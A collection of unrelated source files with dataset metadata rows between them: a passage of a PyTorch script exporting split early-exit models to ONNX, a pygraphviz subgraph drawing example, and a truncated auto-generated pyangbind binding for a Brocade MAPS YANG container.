load_graph_from_args(pipeline_name, framework, model_name, tokenizer) input_names, output_names, dynamic_axes, tokens = infer_shapes(nlp, "pt") ordered_input_names, s1_model_args = ensure_valid_input(nlp.model, tokens, input_names) dynamic_axes.pop('output_0') dynamic_axes.pop('output_1') if begin_point == 0: s1_output_names = ["output1", "exit_output"] s1_dynamic_axes = copy.deepcopy(dynamic_axes) s1_dynamic_axes['output1'] = {0: 'batch', 1: 'sequence'} s1_dynamic_axes['exit_output'] = {0: 'batch'} torch.onnx.export( s1_model, s1_model_args, f="/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s1.onnx", input_names=ordered_input_names, output_names=s1_output_names, dynamic_axes=s1_dynamic_axes, do_constant_folding=True, 
enable_onnx_checker=True, opset_version=11, ) else: s1_output_names = ["output1", "exit_output"] s1_dynamic_axes = copy.deepcopy(dynamic_axes) s1_dynamic_axes.pop('token_type_ids') s1_dynamic_axes['output1'] = {0: 'batch', 1: 'sequence'} s1_dynamic_axes['exit_output'] = {0: 'batch'} s1_model_args = (torch.Tensor(1, 7, 768), torch.Tensor(1, 7)) torch.onnx.export( s1_model, s1_model_args, f="/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s1.onnx", input_names=ordered_input_names[:2], output_names=s1_output_names, dynamic_axes=s1_dynamic_axes, do_constant_folding=True, enable_onnx_checker=True, opset_version=11, ) s2_output_names = ["final_output"] s2_dynamic_axes = copy.deepcopy(dynamic_axes) s2_dynamic_axes.pop('token_type_ids') s2_dynamic_axes['final_output'] = {0: 'batch'} s2_model_args = (torch.Tensor(1, 7, 768), torch.Tensor(1, 7)) torch.onnx.export( s2_model, s2_model_args, f="/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s2.onnx", input_names=ordered_input_names[:2], output_names=s2_output_names, dynamic_axes=s2_dynamic_axes, do_constant_folding=True, enable_onnx_checker=True, opset_version=11, ) # elif inst.backbone == "Wav2Vec2": # pass def model_export_func_backup(model_name, split_point_s1, split_point_s2, split_point_s3): inst = construct_net(split_point_s1=split_point_s1, split_point_s2=split_point_s2, split_point_s3=split_point_s3, backbone = model_name) # dummy_input1 = torch.randn(1, 3, 513, 513) if inst.backbone == "resnet" or inst.backbone == "posenet": dummy_input1 = torch.randn(1, 3, 224, 224) elif inst.backbone == "openseg": dummy_input1 = torch.randn(1, 3, 1024, 2048) # dummy_input1 = torch.randn(1, 3, 384, 384) elif inst.backbone == "Wav2Vec2": dummy_input1 = torch.randn(1, 10000) s1_model = inst.construct_net_s1() s1_model.eval() if inst.backbone == "resnet": dummy_input2 = s1_model(dummy_input1) dummy_input2 = dummy_input2[0] elif inst.backbone == "posenet": 
dummy_input2, x_exit = s1_model(dummy_input1) # dummy_input2 = dummy_input2[0] elif inst.backbone == "Wav2Vec2": dummy_input2 = torch.randn(1, 624, 768) elif inst.backbone == "openseg": # x_dsn, x, x_moveon = s1_model(dummy_input1) dummy_input2 = torch.randn(1, 1024, 129, 257) # dummy_input2 = torch.randn(1, 1024, 48, 48) # print(x_moveon.shape) s2_model = inst.construct_net_s2() s2_model.eval() if inst.backbone == "resnet" or inst.backbone == "posenet": dummy_input3 = s2_model(dummy_input2) elif inst.backbone == "Wav2Vec2": dummy_input3 = torch.randn(1, 624, 768) elif inst.backbone == "openseg": # x_dsn, x, x_moveon = s1_model(dummy_input1) dummy_input3 = torch.randn(1, 1024, 129, 257) # dummy_input2 = torch.randn(1, 1024, 48, 48) # print(x_moveon.shape) s3_model = inst.construct_net_s3() s3_model.eval() print("split_point_s1: " + str(split_point_s1)) print("split_point_s2: " + str(split_point_s2)) print("split_point_s3: " + str(split_point_s3)) # print(dummy_input1.shape) # print(dummy_input2.shape) if inst.backbone == "resnet" or inst.backbone == "posenet" or inst.backbone == "Wav2Vec2": s1_input_names = ["input"] s1_output_names = ["output1", "exit_output"] torch.onnx.export(s1_model, dummy_input1, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s1.onnx", input_names=s1_input_names, output_names=s1_output_names, verbose=False,dynamic_axes={ 'input': {0: 'batch_size'}, 'output1': {0: 'batch_size'}, 'exit_output': {0: 'batch_size'}, },opset_version=11) s2_input_names = ["input"] s2_output_names = ["trans_output"] torch.onnx.export(s2_model, dummy_input2, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s2.onnx", input_names=s2_input_names, output_names=s2_output_names, verbose=False,dynamic_axes={ 'input': {0: 'batch_size'}, 'final_output': {0: 'batch_size'}, },opset_version=11) s3_input_names = ["trans_input"] s3_output_names = ["final_output"] torch.onnx.export(s3_model, dummy_input3, 
"/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s3.onnx", input_names=s3_input_names, output_names=s3_output_names, verbose=False,dynamic_axes={ 'trans_input': {0: 'batch_size'}, 'final_output': {0: 'batch_size'}, },opset_version=11) elif inst.backbone == "openseg": s1_input_names = ["input"] # s1_output_names = ["output_dsn", "output", "x_moveon"] s1_output_names = ["output_dsn", "output"] torch.onnx.export(s1_model, dummy_input1, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s1.onnx", input_names=s1_input_names, output_names=s1_output_names, verbose=False,dynamic_axes={ 'input': {0: 'batch_size'}, 'output_dsn': {0: 'batch_size'}, 'output': {0: 'batch_size'}, # 'x_moveon': {0: 'batch_size'}, },opset_version=11) s2_input_names = ["input"] s2_output_names = ["output_dsn", "output"] torch.onnx.export(s2_model, dummy_input2, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s2.onnx", input_names=s2_input_names, output_names=s2_output_names, verbose=False,dynamic_axes={ 'input': {0: 'batch_size'}, 'output_dsn': {0: 'batch_size'}, 'output': {0: 'batch_size'}, },opset_version=11) elif inst.backbone == "bert": from transformers.convert_graph_to_onnx import load_graph_from_args, infer_shapes, ensure_valid_input pipeline_name = "feature-extraction" framework = "pt" model_name = "bert-base-uncased" tokenizer = "bert-base-uncased" nlp = load_graph_from_args(pipeline_name, framework, model_name, tokenizer) input_names, output_names, dynamic_axes, tokens = infer_shapes(nlp, "pt") ordered_input_names, s1_model_args = ensure_valid_input(nlp.model, tokens, input_names) dynamic_axes.pop('output_0') dynamic_axes.pop('output_1') s1_output_names = ["output1", "exit_output"] s1_dynamic_axes = copy.deepcopy(dynamic_axes) s1_dynamic_axes['output1'] = {0: 'batch', 1: 'sequence'} s1_dynamic_axes['exit_output'] = {0: 'batch'} torch.onnx.export( s1_model, s1_model_args, 
f="/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s1.onnx", input_names=ordered_input_names, output_names=s1_output_names, dynamic_axes=s1_dynamic_axes, do_constant_folding=True, enable_onnx_checker=True, opset_version=11, ) s2_output_names = ["final_output"] s2_dynamic_axes = copy.deepcopy(dynamic_axes) s2_dynamic_axes.pop('token_type_ids') s2_dynamic_axes['final_output'] = {0: 'batch'} s2_model_args = (torch.Tensor(1, 7, 768), torch.Tensor(1, 7)) torch.onnx.export( s2_model, s2_model_args, f="/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s2.onnx", input_names=ordered_input_names[:2], output_names=s2_output_names, dynamic_axes=s2_dynamic_axes, do_constant_folding=True, enable_onnx_checker=True, opset_version=11, ) # elif inst.backbone == "Wav2Vec2": # pass if __name__ == '__main__': model_export_func('resnet', 0, 2)
47.99591
160
0.558074
2,569
23,470
4.75905
0.070066
0.062163
0.034353
0.031981
0.886553
0.86177
0.838541
0.835106
0.817847
0.803533
0
0.044499
0.339327
23,470
489
161
47.99591
0.74397
0.067661
0
0.783163
0
0
0.123678
0.050185
0
0
0
0
0
1
0.017857
false
0
0.028061
0
0.086735
0.012755
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
9644774128e382e30afab914b50858664b8fffd0
3,716
py
Python
nltk/topology/pygraphviz/graphviz.py
kruskod/nltk
dba7b5431b1d57a75d50e048961c1a203b98c3da
[ "Apache-2.0" ]
1
2015-11-25T00:47:58.000Z
2015-11-25T00:47:58.000Z
nltk/topology/pygraphviz/graphviz.py
kruskod/nltk
dba7b5431b1d57a75d50e048961c1a203b98c3da
[ "Apache-2.0" ]
null
null
null
nltk/topology/pygraphviz/graphviz.py
kruskod/nltk
dba7b5431b1d57a75d50e048961c1a203b98c3da
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python # from __future__ import absolute_import # from __future__ import unicode_literals # from __future__ import print_function # from __future__ import division import pygraphviz as pgv def subgraph_example(): # strict (no parallel edges) # digraph # with attribute rankdir set to 'LR' A=pgv.AGraph(directed=False,strict=True,rankdir='TD', shape='none', splines='spline',smoothing=True, outputMode='edgesfirst') # add node 1 with color red A.add_node(0,color='red') #A.add_node(5,color='blue') sg1 = A.add_subgraph(name="cluster1", style='filled', #color='lightgrey', label = 'main' ) sg1.add_node(1,label = "F1") sg1.add_node(2, label = 'F2') sg1.add_node(3) sg2 = A.add_subgraph( name="cluster2", style='filled', #color='lightgrey', label = 'inf' ) sg2.add_node(4) sg2.add_node(5) # sg1.graph_attr['style']='filled' # node [style=filled]; # b0 -> b1 -> b2 -> b3; # label = "process #2"; # color=blue # add some edges # A.add_edge(0,1) A.add_edge(0,2) A.add_edge(0,3) A.add_edge(2,4, color='green') A.add_edge(2,5) A.add_edge(5,0) # sg2.add_edge(5,2) # A.add_edge(1,4,color='green') # A.add_edge(1,3) # A.add_edge(1,3) # sg1.add_edge(3,4) # A.add_edge(3,5) # A.add_edge(3,6) # A.add_edge(4,6) # sg2.add_edge(6,2) # adjust a graph parameter #A.graph_attr['epsilon']='0.001' # A.node_attr['shape']='none' A.node_attr['shape']='box' A.node_attr['style']='rounded' # A.graph_attr['shape']='box' print(A.string()) # print dot file to standard output A.layout('dot') # layout with dot A.draw('foo.ps') # write to file def elleipo_tree(): # strict (no parallel edges) # digraph # with attribute rankdir set to 'LR' A=pgv.AGraph(directed=False,strict=True,rankdir='TD',shape='plaintext', splines='ortho',smoothing=True, outputMode='edgesfirst') # add node 1 with color red A.add_node(0,color='red', label="<Regular<SUB>subscript</SUB>>") #A.add_node(5,color='blue') sg1 = A.add_subgraph(name="cluster1", style='filled', #color='lightgrey', label = 'main' ) sg1.add_node(1,label = "F1") 
sg1.add_node(2, label = 'F2') sg1.add_node(3) sg2 = A.add_subgraph( name="cluster2", style='filled', #color='lightgrey', label = 'inf' ) sg2.add_node(4) sg2.add_node(5) # sg1.graph_attr['style']='filled' # node [style=filled]; # b0 -> b1 -> b2 -> b3; # label = "process #2"; # color=blue # add some edges # A.add_edge(0,1) A.add_edge(0,2) A.add_edge(0,3) A.add_edge(2,4, color='green') A.add_edge(2,5) A.add_edge(5,0) # sg2.add_edge(5,2) # A.add_edge(1,4,color='green') # A.add_edge(1,3) # A.add_edge(1,3) # sg1.add_edge(3,4) # A.add_edge(3,5) # A.add_edge(3,6) # A.add_edge(4,6) # sg2.add_edge(6,2) # adjust a graph parameter #A.graph_attr['epsilon']='0.001' # A.node_attr['shape']='none' # A.node_attr['shape']='box' # A.node_attr['style']='rounded' # A.graph_attr['shape']='box' print(A.string()) # print dot file to standard output A.layout('dot') # layout with dot A.draw('foo.ps') # write to file if __name__ == "__main__": elleipo_tree() #demo_simplifier() #unify_demo() # demo()
25.805556
132
0.55409
538
3,716
3.656134
0.195167
0.065074
0.097611
0.027453
0.850025
0.850025
0.850025
0.850025
0.850025
0.850025
0
0.046425
0.281216
3,716
144
133
25.805556
0.690004
0.408235
0
0.727273
0
0
0.102022
0.013634
0
0
0
0
0
1
0.036364
false
0
0.018182
0
0.054545
0.036364
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
96462e53e6a1e74fe87ddf79d8465f753e0d50ae
27,392
py
Python
pybind/nos/v7_1_0/rbridge_id/maps/__init__.py
shivharis/pybind
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
[ "Apache-2.0" ]
null
null
null
pybind/nos/v7_1_0/rbridge_id/maps/__init__.py
shivharis/pybind
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
[ "Apache-2.0" ]
null
null
null
pybind/nos/v7_1_0/rbridge_id/maps/__init__.py
shivharis/pybind
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
[ "Apache-2.0" ]
1
2021-11-05T22:15:42.000Z
2021-11-05T22:15:42.000Z
# Auto-generated pyangbind binding (Python 2 — note `__builtin__`) for the
# YANG container /rbridge-id/maps of the brocade-rbridge module.  Do not
# hand-edit the generated calls: the keyword blobs are repeated verbatim
# inside the error strings below and must stay in sync.
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
# Sibling generated modules, one per child element of this container.
import logicalgroup
import rule
import policy
import enable
import email
import relay


class maps(PybindBase):
  """
  This class was auto-generated by the PythonClass plugin for PYANG
  from YANG module brocade-rbridge - based on the path /rbridge-id/maps.
  Each member element of the container is represented as a class
  variable - with a specific YANG type.
  """
  # __slots__ fixes the attribute set; the double-underscore entries are the
  # name-mangled backing stores for the properties defined at class bottom.
  __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__logicalgroup','__rule','__policy','__enable','__email','__relay',)

  _yang_name = 'maps'
  _rest_name = 'maps'
  _pybind_generated_by = 'container'

  def __init__(self, *args, **kwargs):
    # Resolve the XPath helper: explicit kwarg wins, then the parent's
    # helper, otherwise path registration is disabled (False).
    path_helper_ = kwargs.pop("path_helper", None)
    if path_helper_ is False:
      self._path_helper = False
    elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
      self._path_helper = path_helper_
    elif hasattr(self, "_parent"):
      path_helper_ = getattr(self._parent, "_path_helper", False)
      self._path_helper = path_helper_
    else:
      self._path_helper = False

    # Same resolution order for the extension-methods dict.
    extmethods = kwargs.pop("extmethods", None)
    if extmethods is False:
      self._extmethods = False
    elif extmethods is not None and isinstance(extmethods, dict):
      self._extmethods = extmethods
    elif hasattr(self, "_parent"):
      extmethods = getattr(self._parent, "_extmethods", None)
      self._extmethods = extmethods
    else:
      self._extmethods = False

    # Default-construct every child element.  Containers (enable, email)
    # wrap the generated class directly; lists (relay, rule, policy,
    # logicalgroup) wrap a YANGListType keyed on the YANG list key.
    self.__enable = YANGDynClass(base=enable.enable, is_container='container', presence=False, yang_name="enable", rest_name="enable", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure MAPS policy/actions', u'callpoint': u'maps_enable_policy_callpoint', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='container', is_config=True)
    self.__relay = YANGDynClass(base=YANGListType("hostip",relay.relay, yang_name="relay", rest_name="relay", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='hostip', extensions={u'tailf-common': {u'info': u'Configure relay ip mail settings', u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'maps_relay_callpoint'}}), is_container='list', yang_name="relay", rest_name="relay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure relay ip mail settings', u'cli-suppress-mode': None, u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'maps_relay_callpoint'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)
    self.__rule = YANGDynClass(base=YANGListType("rulename",rule.rule, yang_name="rule", rest_name="rule", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='rulename', extensions={u'tailf-common': {u'info': u'Configure Rule', u'cli-suppress-mode': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsRule'}}), is_container='list', yang_name="rule", rest_name="rule", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Rule', u'cli-suppress-mode': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsRule'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)
    self.__policy = YANGDynClass(base=YANGListType("policyname",policy.policy, yang_name="policy", rest_name="policy", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='policyname', extensions={u'tailf-common': {u'info': u'Configure Policy', u'callpoint': u'MapsPolicy'}}), is_container='list', yang_name="policy", rest_name="policy", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Policy', u'callpoint': u'MapsPolicy'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)
    self.__logicalgroup = YANGDynClass(base=YANGListType("logicalgroupname",logicalgroup.logicalgroup, yang_name="logicalgroup", rest_name="group", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='logicalgroupname', extensions={u'tailf-common': {u'info': u'Configure (logical) group', u'cli-suppress-mode': None, u'cli-full-no': None, u'alt-name': u'group', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsLogicalgroup'}}), is_container='list', yang_name="logicalgroup", rest_name="group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure (logical) group', u'cli-suppress-mode': None, u'cli-full-no': None, u'alt-name': u'group', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsLogicalgroup'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)
    self.__email = YANGDynClass(base=email.email, is_container='container', presence=False, yang_name="email", rest_name="email", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'MAPS Email options', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='container', is_config=True)

    # Optional copy-construction: a single positional argument must expose
    # every element of this container; only _changed() elements are copied.
    load = kwargs.pop("load", None)
    if args:
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          continue
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          setmethod(getattr(args[0], e), load=load)

  def _path(self):
    # YANG schema path of this node (delegates to the parent when attached).
    if hasattr(self, "_parent"):
      return self._parent._path()+[self._yang_name]
    else:
      return [u'rbridge-id', u'maps']

  def _rest_path(self):
    # REST path; elements with an empty rest name are skipped.
    if hasattr(self, "_parent"):
      if self._rest_name:
        return self._parent._rest_path()+[self._rest_name]
      else:
        return self._parent._rest_path()
    else:
      return [u'rbridge-id', u'maps']

  def _get_logicalgroup(self):
    """
    Getter method for logicalgroup, mapped from YANG variable /rbridge_id/maps/logicalgroup (list)
    """
    return self.__logicalgroup

  def _set_logicalgroup(self, v, load=False):
    """
    Setter method for logicalgroup, mapped from YANG variable /rbridge_id/maps/logicalgroup (list)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_logicalgroup is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_logicalgroup() directly.
    """
    # Unwrap pyangbind proxy values before re-validating as the target type.
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGListType("logicalgroupname",logicalgroup.logicalgroup, yang_name="logicalgroup", rest_name="group", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='logicalgroupname', extensions={u'tailf-common': {u'info': u'Configure (logical) group', u'cli-suppress-mode': None, u'cli-full-no': None, u'alt-name': u'group', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsLogicalgroup'}}), is_container='list', yang_name="logicalgroup", rest_name="group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure (logical) group', u'cli-suppress-mode': None, u'cli-full-no': None, u'alt-name': u'group', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsLogicalgroup'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """logicalgroup must be of a type compatible with list""",
          'defined-type': "list",
          'generated-type': """YANGDynClass(base=YANGListType("logicalgroupname",logicalgroup.logicalgroup, yang_name="logicalgroup", rest_name="group", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='logicalgroupname', extensions={u'tailf-common': {u'info': u'Configure (logical) group', u'cli-suppress-mode': None, u'cli-full-no': None, u'alt-name': u'group', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsLogicalgroup'}}), is_container='list', yang_name="logicalgroup", rest_name="group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure (logical) group', u'cli-suppress-mode': None, u'cli-full-no': None, u'alt-name': u'group', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsLogicalgroup'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)""",
        })
    self.__logicalgroup = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_logicalgroup(self):
    # Reset to the default-constructed (empty) list.
    self.__logicalgroup = YANGDynClass(base=YANGListType("logicalgroupname",logicalgroup.logicalgroup, yang_name="logicalgroup", rest_name="group", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='logicalgroupname', extensions={u'tailf-common': {u'info': u'Configure (logical) group', u'cli-suppress-mode': None, u'cli-full-no': None, u'alt-name': u'group', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsLogicalgroup'}}), is_container='list', yang_name="logicalgroup", rest_name="group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure (logical) group', u'cli-suppress-mode': None, u'cli-full-no': None, u'alt-name': u'group', u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsLogicalgroup'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)

  def _get_rule(self):
    """
    Getter method for rule, mapped from YANG variable /rbridge_id/maps/rule (list)
    """
    return self.__rule

  def _set_rule(self, v, load=False):
    """
    Setter method for rule, mapped from YANG variable /rbridge_id/maps/rule (list)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_rule is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_rule() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGListType("rulename",rule.rule, yang_name="rule", rest_name="rule", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='rulename', extensions={u'tailf-common': {u'info': u'Configure Rule', u'cli-suppress-mode': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsRule'}}), is_container='list', yang_name="rule", rest_name="rule", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Rule', u'cli-suppress-mode': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsRule'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """rule must be of a type compatible with list""",
          'defined-type': "list",
          'generated-type': """YANGDynClass(base=YANGListType("rulename",rule.rule, yang_name="rule", rest_name="rule", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='rulename', extensions={u'tailf-common': {u'info': u'Configure Rule', u'cli-suppress-mode': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsRule'}}), is_container='list', yang_name="rule", rest_name="rule", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Rule', u'cli-suppress-mode': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsRule'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)""",
        })
    self.__rule = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_rule(self):
    self.__rule = YANGDynClass(base=YANGListType("rulename",rule.rule, yang_name="rule", rest_name="rule", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='rulename', extensions={u'tailf-common': {u'info': u'Configure Rule', u'cli-suppress-mode': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsRule'}}), is_container='list', yang_name="rule", rest_name="rule", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Rule', u'cli-suppress-mode': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None, u'callpoint': u'MapsRule'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)

  def _get_policy(self):
    """
    Getter method for policy, mapped from YANG variable /rbridge_id/maps/policy (list)
    """
    return self.__policy

  def _set_policy(self, v, load=False):
    """
    Setter method for policy, mapped from YANG variable /rbridge_id/maps/policy (list)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_policy is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_policy() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGListType("policyname",policy.policy, yang_name="policy", rest_name="policy", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='policyname', extensions={u'tailf-common': {u'info': u'Configure Policy', u'callpoint': u'MapsPolicy'}}), is_container='list', yang_name="policy", rest_name="policy", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Policy', u'callpoint': u'MapsPolicy'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """policy must be of a type compatible with list""",
          'defined-type': "list",
          'generated-type': """YANGDynClass(base=YANGListType("policyname",policy.policy, yang_name="policy", rest_name="policy", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='policyname', extensions={u'tailf-common': {u'info': u'Configure Policy', u'callpoint': u'MapsPolicy'}}), is_container='list', yang_name="policy", rest_name="policy", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Policy', u'callpoint': u'MapsPolicy'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)""",
        })
    self.__policy = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_policy(self):
    self.__policy = YANGDynClass(base=YANGListType("policyname",policy.policy, yang_name="policy", rest_name="policy", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='policyname', extensions={u'tailf-common': {u'info': u'Configure Policy', u'callpoint': u'MapsPolicy'}}), is_container='list', yang_name="policy", rest_name="policy", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure Policy', u'callpoint': u'MapsPolicy'}}, namespace='urn:brocade.com:mgmt:brocade-maps', defining_module='brocade-maps', yang_type='list', is_config=True)

  def _get_enable(self):
    """
    Getter method for enable, mapped from YANG variable /rbridge_id/maps/enable (container)
    """
    return self.__enable

  def _set_enable(self, v, load=False):
    """
    Setter method for enable, mapped from YANG variable /rbridge_id/maps/enable (container)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_enable is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_enable() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
